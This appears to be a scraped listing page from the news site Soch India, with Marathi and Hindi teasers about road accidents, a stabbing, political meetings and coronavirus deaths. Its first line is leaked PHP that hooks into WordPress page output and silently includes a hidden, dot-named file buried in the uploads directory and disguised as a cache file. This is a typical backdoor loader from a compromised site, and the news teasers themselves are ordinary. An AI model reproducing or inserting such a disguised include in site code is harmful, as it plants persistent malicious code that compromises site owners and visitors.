add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

सध्या सुरू असलेल्या बारावी परीक्षेचा पेपर देण्यासाठी निघालेल्या एका विद्यार्थ्यांचा रस्ते अपघातात मृत्यू झाला, तर अन्य एका परीक्षार्थीसह दोघे जण जखमी झाले. सोलापूर-पुणे महामार्गावर मोहोळ येथे सकाळी एका अज्ञात वाहनाने ठोकरल्याने ही दुर्घटना घडली. मोहोळ पोलीस ठाण्यात याप्रकरणी अज्ञात वाहनचालकाविरूध्द गुन्हा दाखल झाला आहे. सौरभ दशरथ वाघ (वय १८,...

Read More

महाराष्ट्र के मुख्यमंत्री और शिवसेना प्रमुख उद्धव ठाकरे दिल्ली पहुंच चुके हैं. तय कार्यक्रम के मुताबिक वे आज थोड़ी देर में प्रधानमंत्री नरेंद्र मोदी से मुलाकात कर सकते हैं. ताजा जानकारी के मुताबिक पीएम मोदी से मुलाकात के बाद उद्धव ठाकरे दिल्ली में संजय राउत के सरकारी निवास 15...

Read More

शिवजयंतीच्या मिरवणुकीत झेंडय़ावरून झालेल्या किरकोळ वादातून श्रीकांत गोपीचंद शिंदे (वय २१) या तरुणाचा चाकू भोसकून खून करण्यात आला. ही घटना बुधवारी रात्री ९ च्या सुमारास हनुमान चौक ते पुंडलिकनगर रस्त्यावर घडली. या प्रकरणी रात्री उशिरा मृत श्रीकांतचा भाऊ सूरज याच्या फिर्यादीवरून अज्ञातांविरोधात गुन्हा दाखल करण्यात आल्यानंतर पुंडलिकनगर पोलिसांनी आरोपींच्या...

Read More

लाखो वारकऱ्यांचे श्रद्धास्थान असलेल्या आळंदीमध्ये हरिपाठ न आल्याने मुलाला बेदम मारहाण करण्यात आली. मागील आठ दिवसांपासून ११ वर्षीय मुलगा कोमात होता. ओम राजू चौधरी असे मारहाण झालेल्या मुलाचे नाव असून सध्या त्याच्यावर पिंपरी-चिंचवडमधील रुग्णालयात उपचार सुरू आहेत. परंतु, त्यांची प्रकृती नाजूक असून तो अद्यापही कोमात आहे अशी माहिती पोलिसांनी...

Read More

सोलापुरजवळ एसटी आणि जीपच्या झालेल्या भीषण अपघातात पाच जणांचा जागीच मृत्यू झाला आहे. वैरागजवळील राळेरास येथे भीषण अपघात झाला आहे. या अपघातांमध्ये दहा जण जखमी झाले आहेत. जखमीतील पाच ते सहा जणांची प्रकृती गंभीर असल्याचं बोललं जातेय. जखमींना उपचारासाठी जवळील रूग्णालयात दाखल करण्यात आले आहे. बार्शीकडून सोलापूरकडे निघालेल्या एसटी...

Read More

भारतीय विज्ञान शिक्षण आणि संशोधन संस्थेतील (आयसर) वैज्ञानिकांना गोमूत्रापासून विद्युतघटाची (बॅटरी) निर्मिती करण्यात यश आले आहे. ३०-३५ मिली गोमूत्रापासून १.५ व्होल्ट वीज निर्मिती होऊ शकत असल्याचे या संशोधनातून दिसून झाले आहे. आयसर, पुणेमधील डॉ. मोहम्मद मुस्तफा यांच्या नेतृत्वाखाली डॉ. मृत्युंजयचारी, मनू गौतम, सौमदीप सूर आणि अलागर राजा यांनी हे...

Read More

 जपानच्या किनाऱ्यावर उभ्या असलेल्या डायमण्ड प्रिन्सेस या क्रूझवरील दोघा वयोवृद्ध माजी प्रवाशांचा करोना विषाणूच्या संसर्गाने गुरुवारी मृत्यू झाला आहे, असे जपानच्या अधिकाऱ्यांनी सांगितले. करोना विषाणूची लागण झाली नसल्याचे स्पष्ट झाल्यानंतर क्रूझवरून निघून गेलेल्या प्रवाशांमध्ये भीतीचे वातावरण पसरले आहे. भारतामधील सात जणांना करोनाची लागण झाली असून त्यांच्यावर उपचार सुरू आहेत....

Read More

ऑल इंडिया मजलिस ए इत्तेहादुल मुस्लिमीन (एआयएमआयएम)चे प्रवक्ते आणि भायखळाचे माजी आमदार वारीस पठाण यांनी आपल्या वादग्रस्त वक्तव्यावरून माफी मागण्यास स्पष्ट शब्दात नकार दिला आहे. मी जे काही म्हटलेय ते संविधानाच्या मर्यादेतच राहून बोललो असल्याचं स्पष्टीकरण वारीस पठाण यांनी दिलं आहे. “१५ कोटी आहोत, पण १०० कोटींना भारी आहोत,...

Read More

राजस्थान में गहलोत सरकार चुनावी घोषणा पत्र को हर हाल में लागू करने में जुटी है. इसी का नतीजा है कि बेरोजगार युवाओं को पहले से पांच गुणा बेरोजगारी भत्ता मिलने लगा तो युवाओं को बड़ी राहत मिलने लगी. अलवर के रोजगार कार्यालयों में बेरोजगारों का रजिस्ट्रेशन भी बढ़ गया है. राजस्थान में...

Read More

वसई पट्टय़ातील तुंगारेश्वर वन्यजीव अभयारण्याच्या प्रतिबंधित क्षेत्रात भरधाव दुचाकी चालवून धुमाकूळ घालणाऱ्या सहा दुचाकीस्वारांना अटक करण्यात आली असून त्यांना जामिनावर सोडण्यात आले आहे. या सहा जणांमध्ये प्रसिद्ध दुचाकीस्वार झुबिन पटेल याचाही समावेश आहे. तुंगारेश्वर वन्यजीव अभयारण्यात गेल्या रविवारी ९ फेब्रुवारी काही दुचाकीस्वारांनी धुमाकूळ घातल्याची घटना उघडकीस आली होती. तुंगारेश्वर...

Read More